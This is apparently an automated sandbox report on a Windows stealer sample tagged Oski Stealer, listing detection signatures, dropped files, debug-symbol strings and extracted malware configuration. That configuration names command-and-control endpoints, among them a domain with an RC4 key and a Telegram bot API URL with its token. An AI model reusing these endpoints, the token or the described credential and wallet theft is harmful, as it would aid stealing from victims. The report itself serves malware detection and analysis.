Windows Analysis Report 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe

Overview

General Information

Sample Name: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Analysis ID: 553216
MD5: 39bfd2ce7cffeafc8f4d85d89fd6f072
SHA1: 9d0df13ef8de579a2bbfba88e938a836ffab1069
SHA256: 18719d6856a09a622001f1c325067d56afa63bd21fbad25fd23c01b2c0c67472
Tags: exeOskiStealer
Infos:

Most interesting Screenshot:

Detection

AveMaria Oski Stealer Redline Clipper StormKitty Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Redline Clipper
Sigma detected: Capture Wi-Fi password
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected Oski Stealer
Antivirus / Scanner detection for submitted sample
Yara detected StormKitty Stealer
Yara detected Vidar stealer
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Downloads files with wrong headers with respect to MIME Content-Type
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Posts data to a JPG file (protocol mismatch)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Detected VMProtect packer
Tries to steal Crypto Currency Wallets
Tries to harvest and steal WLAN passwords
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Avira: detection malicious, Label: TR/Agent.pyynm
Source: C:\Users\user\AppData\Local\Temp\dll.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\ProgramData\AMD Driver\taskshell.exe Avira: detection malicious, Label: HEUR/AGEN.1124739
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Avira: detection malicious, Label: HEUR/AGEN.1209556
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Avira: detection malicious, Label: TR/AD.Chapak.dvwuj
Found malware configuration
Source: 6.2.chormuimii.exe.4af0000.10.unpack Malware Configuration Extractor: Oski {"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}
Source: 6.2.chormuimii.exe.4af0000.10.unpack Malware Configuration Extractor: Vidar {"C2 url": "aegismd.ca/cgi/", "RC4 Key": "056139954853430408"}
Source: chormuim.exe.6504.8.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/sendMessage"}
Multi AV Scanner detection for submitted file
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Virustotal: Detection: 70% Perma Link
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Metadefender: Detection: 31% Perma Link
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe ReversingLabs: Detection: 74%
Antivirus / Scanner detection for submitted sample
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Avira: detected
Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\AMD Driver\taskshell.exe Metadefender: Detection: 40% Perma Link
Source: C:\ProgramData\AMD Driver\taskshell.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Metadefender: Detection: 43% Perma Link
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll ReversingLabs: Detection: 75%
Machine Learning detection for sample
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dll.exe Joe Sandbox ML: detected
Source: C:\ProgramData\AMD Driver\taskshell.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.dll.exe.10000.0.unpack Avira: Label: TR/ATRAPS.Gen
Source: 6.0.chormuimii.exe.400000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen
Source: 6.2.chormuimii.exe.4b5ec00.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.chormuimii.exe.2406b90.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.dll.exe.10000.0.unpack Avira: Label: TR/ATRAPS.Gen
Source: 6.2.chormuimii.exe.4c0fb62.11.unpack Avira: Label: TR/Patched.Ren.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8CB10 CryptUnprotectData,LocalAlloc,LocalFree, 4_2_00B8CB10
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8C900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 4_2_00B8C900
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8CBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 4_2_00B8CBA0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8CD30 _malloc,_malloc,CryptUnprotectData, 4_2_00B8CD30
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8EED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 4_2_00B8EED0
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D5ED9 CryptUnprotectData, 8_2_00007FFC089D5ED9

Compliance:

barindex
Uses 32bit PE files
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: pnrpnsp.pdbO source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source: Binary string: System.Configuration.ni.pdbNW source: WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbU source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: 0C:\Windows\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbo source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: i.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb{ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source: Binary string: ole32.pdba source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: edputil.pdbc source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbX source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdbG source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: clrjit.pdbD source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbR source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS5 source: WER5768.tmp.dmp.29.dr
Source: Binary string: nsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ source: WER5768.tmp.dmp.29.dr
Source: Binary string: _.pdbHD source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdbq source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb[ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winrnr.pdb: source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdbO_ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER5768.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdbRSDS] source: WER5768.tmp.dmp.29.dr
Source: Binary string: dpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: psapi.pdbz source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER5768.tmp.dmp.29.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdbL source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: combase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.4.dr
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK source: chormuim.exe, 00000008.00000003.350829566.000000001B765000.00000004.00000001.sdmp
Source: Binary string: vaultcli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: sspicli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: symbols\dll\mscorlib.pdbpdb0x source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb/ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wmiutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemsvc.pdb8 source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: clr.pdbM source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: %mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398156992.0000026D703B7000.00000004.00000001.sdmp
Source: Binary string: gdi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb} source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb^ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdbe source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: fastprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: clr.pdb0 source: WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source: Binary string: user32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdb source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: fastprox.pdbW source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: win32u.pdbf source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb* source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb"" source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: wbemcomn.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001D.00000003.387264777.0000026D70821000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb` source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source: Binary string: orms.ni.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: gdi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
